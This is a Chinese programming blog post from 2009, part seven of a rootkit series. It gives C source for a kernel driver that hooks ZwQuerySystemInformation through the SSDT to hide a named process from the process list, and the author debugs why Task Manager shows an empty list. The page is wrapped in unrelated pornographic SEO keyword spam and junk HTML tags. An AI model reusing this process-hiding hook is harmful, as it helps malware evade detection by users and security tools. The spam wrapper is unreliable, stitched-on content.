青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (七)

Posted on 2009-10-27 17:32 S.l.e!ep.¢% 閱讀(333) 評論(0)  編輯 收藏 引用 所屬分類: RootKit

[資料] http://m.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (六)??

下面這個函數有問題,運行之后,Taskmgr.exe 里面的進程列表估然顯示為空
NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?
// 定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(
& process_name,?L " taskmgr.exe " );
????
????rc?
= ?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????
if (NT_SUCCESS(rc))?
????{
????????
????????
if ( 5 ? == ?SystemInformationClass)
????????{?
????????????
????????????
struct ?_SYSTEM_PROCESSES? * curr? = ?( struct ?_SYSTEM_PROCESSES? * )SystemInformation;?
????????????
struct ?_SYSTEM_PROCESSES? * prev? = ?NULL;?
????????????
????????????
if (curr -> NextEntryDelta)
????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);?
????????????
????????????
while (curr)
????????????{
????????????????
if ?(RtlEqualUnicodeString( & process_name,? & curr -> ProcessName,? 1 ))
????????????????{
????????????????????KdPrint((
" hide?process'name?taskmgr.exe " ));
????????????????????
????????????????????
if (prev)?
????????????????????{?
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? += ?curr -> NextEntryDelta;
????????????????????????}?
????????????????????????
else
????????????????????????{
????????????????????????????prev
-> NextEntryDelta? = ? 0 ;
????????????????????????}
????????????????????}
????????????????????
else
????????????????????{
????????????????????????
if (curr -> NextEntryDelta)
????????????????????????{
????????????????????????????SystemInformation?
= (PVOID)((ULONG)SystemInformation? + ?curr -> NextEntryDelta);
????????????????????????}
????????????????????????
else
????????????????????????{
????????????????????????????SystemInformation?
= ?NULL;
????????????????????????}
????????????????????}
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????{
????????????????????????curr?
= ?NULL;
????????????????????????
break ;
????????????????????}
????????????????????
????????????????}?
// ?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????
????????????????
if (curr? != ?NULL)
????????????????{
????????????????????prev?
= ?curr;
????????????????????
????????????????????
if (curr -> NextEntryDelta)
????????????????????????curr?
= ?(_SYSTEM_PROCESSES? * )((ULONG)curr? + ?curr -> NextEntryDelta);
????????????????????
else
????????????????????????curr?
= ?NULL;
????????????????????
????????????????}
// ?if(curr?!=?NULL)
????????????????
????????????}
// ?while(curr)?
????????????
????????}
// ?if(5?==?SystemInformationClass)
????????
????}
// ?if(NT_SUCCESS(rc))
????
????
// ?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
???? return ?rc;
}

使用自己的查詢進程EXE(HOOK SSDT Hide Process (五) ),顯示結果是正常的

驅動中判斷的是 taskmgr.exe?,在遍歷時,taskmgr.exe 剛好在最好一個,把 NextEntryDelta 設置為 0 了
如果是其它的 abc.exe ,然后再打開 taskmgr.exe 是沒問題的

看來,HOOK SSDT Hide Process (五) 遍歷進程的實現 跟 Taskmgr.exe 的實現有差異, 需要再找時間看下原因

MyZwQuerySystemInformation() 的實現來看,只是簡單地修改了下 NextEntryDelta ,并非真正意義上的'隱藏'
還是會把數據傳給用戶態。
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            久久一区欧美| 久久人人超碰| 国产欧美日韩精品一区| 欧美午夜电影在线观看| 欧美精品久久久久久久久老牛影院 | 国产精品久久久久久久一区探花| 欧美激情精品久久久久久黑人 | 一区二区免费在线视频| 日韩亚洲在线观看| 亚洲无线视频| 性欧美超级视频| 久久久91精品| 欧美激情在线观看| 欧美日韩在线观看一区二区| 国产精品久久久久影院亚瑟| 国产麻豆91精品| 亚洲午夜影视影院在线观看| 亚洲欧美卡通另类91av| 久久久久久久久综合| 欧美成人午夜激情视频| 欧美午夜不卡| 亚洲国产合集| 亚洲少妇在线| 久久视频在线视频| 日韩午夜在线视频| 久久成人亚洲| 欧美日韩综合在线| 尤妮丝一区二区裸体视频| 中文日韩欧美| 美女国产一区| 亚洲桃花岛网站| 欧美sm重口味系列视频在线观看| 国产精品国产精品国产专区不蜜| 在线成人中文字幕| 午夜精品一区二区三区在线| 欧美成人在线网站| 国产欧美日韩视频| 亚洲娇小video精品| 性欧美8khd高清极品| 亚洲国产成人久久| 亚洲欧美自拍偷拍| 欧美视频精品在线| 亚洲国产一区在线观看| 欧美在线一级视频| 99精品热视频| 日韩亚洲国产欧美| 9人人澡人人爽人人精品| 亚洲免费成人av| 欧美中文字幕不卡| 亚洲国产人成综合网站| 亚洲伦理中文字幕| 久久精品99国产精品| 亚洲国产免费| 久久免费视频在线观看| 国产精品乱人伦一区二区| 1024成人| 欧美大片免费看| 久久影音先锋| 亚洲国产一区二区在线| 久久阴道视频| 久久精品一区二区三区不卡| 国产精品亚洲综合一区在线观看| 一本色道**综合亚洲精品蜜桃冫 | 久久综合给合| 欧美一级理论性理论a| 国产精品区一区二区三| 亚洲一区二区三区在线看| 亚洲美女中文字幕| 欧美亚州一区二区三区| 午夜精品99久久免费| 亚洲一区免费在线观看| 国产精品免费一区二区三区在线观看| 亚洲女人天堂成人av在线| 亚洲天堂成人在线观看| 欧美性猛交xxxx乱大交退制版 | 一区二区三区日韩精品| 亚洲开发第一视频在线播放| 欧美日韩国产精品成人| 一本久久a久久免费精品不卡| 一区二区高清视频| 国产日韩精品在线观看| 国产精品免费小视频| 亚洲欧美日韩专区| 亚欧美中日韩视频| 欧美一级理论性理论a| 免费不卡在线观看| 亚洲尤物在线视频观看| 欧美性做爰毛片| 欧美中文在线观看| 亚洲男人的天堂在线观看| 99精品视频免费| 国产日本欧美视频| 久久噜噜噜精品国产亚洲综合| 久久精品亚洲精品| 亚洲日本成人| 亚洲欧洲日本mm| 久久蜜桃香蕉精品一区二区三区| 久久综合网络一区二区| 亚洲一区二区三区四区在线观看| 国产精品麻豆欧美日韩ww| 久久精品成人一区二区三区蜜臀 | 久久综合五月| 99re6这里只有精品| 亚洲综合成人婷婷小说| 一区福利视频| 狠狠色综合网| 最新高清无码专区| 国产精品欧美一区喷水| 美女黄毛**国产精品啪啪| 欧美日本韩国一区| 久久久久亚洲综合| 欧美大片在线观看一区| 久久精品国产亚洲一区二区三区| 午夜在线精品| 最新成人av网站| 午夜精品www| 在线亚洲精品| 久久综合九色欧美综合狠狠| 亚洲一区3d动漫同人无遮挡| 久久不射电影网| 亚洲伊人伊色伊影伊综合网| 久久综合国产精品| 午夜性色一区二区三区免费视频| 老司机精品视频一区二区三区| 亚洲一区二区三区精品动漫| 久久婷婷综合激情| 久久se精品一区二区| 欧美中文字幕视频| 欧美破处大片在线视频| 欧美成人午夜视频| 一区精品在线| 欧美一区视频| 久久久av网站| 国产一级一区二区| 午夜精品久久久久久久久 | 99国产精品99久久久久久| 午夜精品美女自拍福到在线 | 久久久综合视频| 久久综合婷婷| 性做久久久久久久久| 欧美日韩国产在线播放| 欧美a级一区| 在线观看91精品国产入口| 欧美专区福利在线| 久久深夜福利免费观看| 国内精品久久久久影院色| 亚洲手机视频| 欧美精品一区二区三区蜜桃| 欧美成人精品一区二区三区| 精品成人在线观看| 久久精品综合网| 欧美激情精品久久久久久变态| 亚洲国产精品美女| 欧美成人精品在线播放| 亚洲国产福利在线| 日韩一级欧洲| 欧美日韩免费高清| 亚洲一区二区三区午夜| 欧美一区中文字幕| 海角社区69精品视频| 久久久久久久性| 亚洲国产综合在线| 亚洲一区亚洲二区| 久久久久看片| 国产精品综合| 欧美在线免费| 激情一区二区| 欧美xx69| 亚洲一区二区三区三| 久久精品一区二区| 亚洲高清中文字幕| 欧美日韩一区三区| 欧美一区二区三区在线观看| 欧美多人爱爱视频网站| 艳女tv在线观看国产一区| 国产精品女主播| 久久久久免费视频| 日韩一级大片在线| 久久免费高清视频| 一区二区高清视频| 狠狠色狠狠色综合日日91app| 欧美激情精品久久久久久黑人| 亚洲小说春色综合另类电影| 欧美sm视频| 午夜一级久久| 99re视频这里只有精品| 国产亚洲电影| 欧美日韩四区| 狂野欧美一区| 亚洲新中文字幕| 亚洲国产第一| 久久欧美肥婆一二区| 亚洲视频免费| 亚洲日本欧美天堂| 激情亚洲成人| 国产日韩在线视频| 国产精品美女久久| 欧美日韩一区在线播放| 欧美国产一区二区在线观看| 久久精品国产精品亚洲综合|